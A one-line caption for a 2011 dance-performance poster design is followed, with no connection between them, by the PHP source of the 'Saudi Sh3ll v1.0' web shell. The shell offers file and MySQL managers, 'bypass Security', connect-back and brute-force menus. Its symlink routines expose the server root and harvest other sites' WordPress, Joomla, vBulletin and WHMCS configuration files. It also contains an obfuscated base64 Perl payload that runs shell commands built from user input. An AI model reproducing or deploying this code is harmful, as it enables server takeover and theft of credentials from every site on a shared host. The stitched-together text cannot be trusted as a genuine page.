09/2011 . Client: Alexandre Paulikevitch . Poster design for Alexandre Paulikevitch's dance performance.

<?
ob_start();
?>

<?php
########################################
#                                        #
#            Saudi Sh3ll v1.0            #
#                                        #
#             by al-swisre               #
#                                        #
########################################/


$auth = 0;
$name='53c2b3524e98b04d105304b7aa5dc97e'; // Saudi
$pass='f5f091a697cd91c4170cda38e81f4b1a'; // Saudi
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
   {
   header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
   header('HTTP/1.0 401 Unauthorized');
   exit("<b></b>");
   }
}
?>


<?






@set_time_limit(0);
@error_reporting(0);


if ($_GET['sws']== 'phpinfo')
{

echo @phpinfo();

exit;

}



echo '


<title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
<meta http-equiv="content=type"  content="text/html; charset=utf-8" />





<style type="text/css">
  html,body {
     margin-top: 5px ;
     padding: 0;
     outline: 0;
}


body {

    direction: ltr;
    background-color: #000000;
    color: #CCCCCC;
    font-family: Tahoma, Arial, sans-serif;
    font-weight: bold;
    text-align: center ;
}

input,textarea,select{
font-weight: bold;
color: #FFFFFF;
dashed #ffffff;
border: 1px dotted #003300;
background-color: black;
padding: 3px
}

input:hover{
box-shadow:0px 0px 4px #009900;

}
.cont a

{


text-decoration: none;
color: #FFFFFF;



}
.hedr
{
font-size:32px;
color: #009900;
text-shadow: 0px 0px 4px #003300 ;



}



.td1{


    border: 1px dotted #022B04;
    padding: 8px;
    border-radius: 20px;
    text-shadow: 0px 0px 2px #003300;
    font-size: 10px;
    font-family: Tahoma;
    font-weight: bold;

}

.td1 tr{}

.lol{
  text-align: left;
  float: left;
  background: #990000;
}
.nop{

width: 180px;
text-align: center;
font-size: 15px;
font-family:Tahoma;
color: #003300;



}
.nop a{
  text-decoration: none;
  color: #003300 ;
  text-shadow: none;
  width: 80px;
  padding: 8px


}
.nop a:hover{
  color: #FFFFFF;
 box-shadow: 0px 0px 4px #006600 ;



  }
a
{
text-decoration: none;
color: #006600;

}


.tmp tr td:hover{

box-shadow: 0px 0px 4px #EEEEEE;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 13pt;
}

.ir {
  color: #FF0000;
}

.cont
{
float:right;
color: #FFFFFF;
box-shadow: 0px 0px 4px #003300;
font-size: 13px;
padding: 8px

}

.cont a{

 text-decoration: none;
 color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 13px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #FF0000 ;
  text-shadow:0px 0px 3px #FF0000 ;


}

.cont3
{
color: #FFFFFF;
font-size: 15px;
padding: 8px

}

.cont3 a{

 text-decoration: none;
 color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 15px;
 text-shadow: 0px 0px 3px ;
}

.cont3 a:hover{


  color: #FF0000 ;
  text-shadow:0px 0px 3px #FF0000 ;


}

.tmp tr td{

border: dotted 1px #003300;

padding: 4px ;
font-size: 14px;
}

.tmp tr td a {
  text-decoration: none;

}
.cmd
{

float:right;

}
 .tbm{
 font-size: 14px;
}

.tbm tr td{
 border: dashed 1px #111111;

}
.hr{

border: dotted 1px #003300;
padding: 5px ;
font-size: 13px;
color: white ;
text-shadow: 0px 0px 3px ;
}

.hr2{

border: dotted 1px #003300;
padding: 5px ;
font-size: 13px;
color: red ;
text-shadow: 0px 0px 3px ;
}

.t3p{
width: 100%;

}

.t3p{margin-left: 45px ;}

.t33p{margin-left: 45px ;}


.t3p tr td{

border:  solid 1px #002F00;
padding: 2px ;
font-size: 13px;
text-align: center ;
font-weight: bold;
margin-left: 20px ;

}
.t3p tr td:hover{

box-shadow: 0px 0px 4px #009900;

}


.info {margin-left: 100px ; }

.info tr td
{

border:  solid 1px #002F00;
padding: 5px ;
font-size: 13px;
text-align: center ;
font-weight: bold;


}
.conn{width: 70%;}

.conn tr td{
border: 1px dashed #003300;
padding: 5px ;
font-size: 13px;
text-align: center ;
font-weight: bold;

}


.lol a{

font-size: 10px;

}

.d0n{
width: 90%;
border-top:  solid 1px #003300;

}
.d0n tr td{
font-weight: bold;
color: #FFFFFF;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 13px;
 margin-left: 110px ;


}
.site
{

font-weight: bold;
width: 50%;
box-shadow: 0px 0px 2px #003300;


}

.ab
{
box-shadow: 0px 0px 6px #444444;
width: 70%;
padding: 10px ;

}

.ab tr td
{
text-align: center ;
font-weight: bold;
 font-family: Tahoma, Arial, sans-serif  ;
  font-size: 13px;
 color: white;
  text-shadow: 0px 0px 2px white ;


}
.ab tr td b
{
color:red ;
text-shadow: 0px 0px 2px red ;
}
.ab tr td a
{
 color: white;
  text-shadow: 0px 0px 2px white ;

}
.ab tr td a:hover
{
color:#006600 ;
text-shadow: none ;
}

.bru
{
color: #FFFFFF;
font-family: Tahoma, Arial, sans-serif  ;
font-size: 14px;
text-shadow: 0px 0px 3px #000000 ;

}

.foter
{

color: #003300;
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 11px;
 text-shadow: 0px 0px 3px #000000 ;


}







</style>

';

echo '

<table width="95%" cellspacing="0" cellpadding="0" class="tb1" >

            <td width="15%" valign="top" rowspan="2">
            <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
             </td>

        <td height="100" align="left" class="td1"   >

';

$pg = basename(__FILE__);

echo "OS : <b><font color=green>";
$safe_mode = @ini_get('safe_mode');
$dir = @getcwd();
$ip=$_SERVER['REMOTE_ADDR'];
$ips=$_SERVER['SERVER_ADDR'];
define('SWS','al-swisre');

if ($os)
{


}
else
{
  $os = @php_uname();
  echo $os ;
}
echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300;   ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
echo "</font><br /></b>";

echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
echo "<br />disable_functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{


echo "<font color=red>$df</font></b>";

}

echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";

echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";


echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";

echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";


echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>

 | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>

| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
| &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";









 echo "
<br />








        </tr>
        </table>

<table cellspacing='0' cellpadding='0'  style=' margin:9px'>

    <tr>
            <td  rowspan='2' class='td1' valign='top' >


        <div class='nop'>

         <br /><a href='$pg' >File Manager</a> <br /> <br />
         <a href='$pg?sws=info' >More info</a> <br /><br />
         <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
         <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
         <a href='$pg?sws=sm' >Symlink</a> <br /><br />
         <a href='$pg?sws=con' >Connect Back</a> <br /><br />
         <a href='?sws=brt' >BruteForce</a> <br /><br />
         <a href='$pg?sws=ab' >About Por</a> <br />



        </div>

    ";





echo '

<td  height="444" width="82%"  align="center" valign="top">

';


if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{


////////////////////////////////////////////////// Symlink //////////////////////////////////////

case 'sm':

$sws = 'al-swisre' ;

$mk = @mkdir('sym',0777);



$htcs  = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n  AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');


@fwrite($f , $htcs);


$sym = @symlink("/","sym/root");




$pg = basename(__FILE__);



echo '<div class="cont3">
[ <a href="?sws=sm"> Symlink File </a>]

[<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sm&sy=sec"> Domains & Script </a>]

[ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
</div><br /><br />'  ;

////////////////////////////////// file ////////////////////////
$sws = 'al-swisre' ;

if(isset($_REQUEST['sy']))
{

switch ($_REQUEST['sy'])
{





/// Domains + Scripts  ///

case 'sec':


$d00m = @file("/etc/named.conf");

if(!$d00m)
{
die (" can't read /etc/named.conf");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2=@get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2=@get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3=@get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5=@get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4=@get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}

/////////////////////////////////////////////////////////////////////////////////////



$site = $user['name'] ;




echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();
exit;

}
}
}
}




break;


/// user + domine + symlink  ///

case 'sym':

$d00m = @file("/etc/named.conf");

if(!$d00m)
{
die (" can't read /etc/named.conf");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>






<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();

}
}
}
}




break;

case 'pl':

if (!is_dir('sa2')){

$mk = @mkdir('sa2',0777);



if (is_file('sa2/perl.pl'))
{


echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";


@chmod('sa2/perl.pl',0755);




}
else
{




$f2 =@fopen ('sa2/perl.pl','w');


$sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";

$write = fwrite ($f2 ,base64_decode($sml_perl));

if ($write)
{

@chmod('sa2/perl.pl',0755);


}

echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
}


break;


}
/// home ///
}
}
else
{

echo '
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';


$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{

@symlink("$pfile","sym/$symfile");

echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
exit;
}else {exit;}




}



break;



//////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////


case 'ms':




$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];






////////////////// HEEEEEEEEEEEEERE  /////////////////////////////////////////////// HEEEEEEEEEEEEERE  /////////////////////////////

if ($_GET['show'] == 'tb'){

$host_c =  $_COOKIE['host_mysql'];
$user_c =  $_COOKIE['user_mysql'];
$pass_c =  $_COOKIE['pass_mysql'];
$db_c   =  $_COOKIE['db_mysql'];


$con = @mysql_connect($host_c,$user_c,$pass_c);
$sel = @mysql_select_db($db_c);


if(!$sel){ echo "mysql connect error" ; exit;}

$dbname = $db_c;

$pTable =  mysql_list_tables( $dbname ) ;

$num = mysql_num_rows( $pTable );

echo "<div class='tmp'>
<table align='center' width='40%'><td> Tables </td><td> Rows </td>";

for( $i = 0; $i < $num; $i++ ) {


    $tablename = mysql_tablename( $pTable, $i );

    $sq3l=mysql_query("select  * from $tablename");

    $c3t=mysql_num_rows($sq3l);

    echo "

    <tr>

<td>
<div class='dom'><a  href='$pg?sws=ms&show=cl&tb=$tablename'  />".$tablename." </a> </div>
</td>


<td>
".$c3t."
</td>

</tr>

    ";




if ($tablename == 'template')  { $secript = 'vb'; }

else if ($tablename == 'wp_post') {$secript = 'wp';}

else if ($tablename == 'jos_users') {$secript = 'jm';}

else if ($tablename == 'tbladmins') {$secript = 'wh';}


}


if ($secript == 'vb')

{


echo '<div class="cont">
<div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
<br />  <br /> <b>
[ <a href="?sws=ms&op=in"> Update Index </a>]

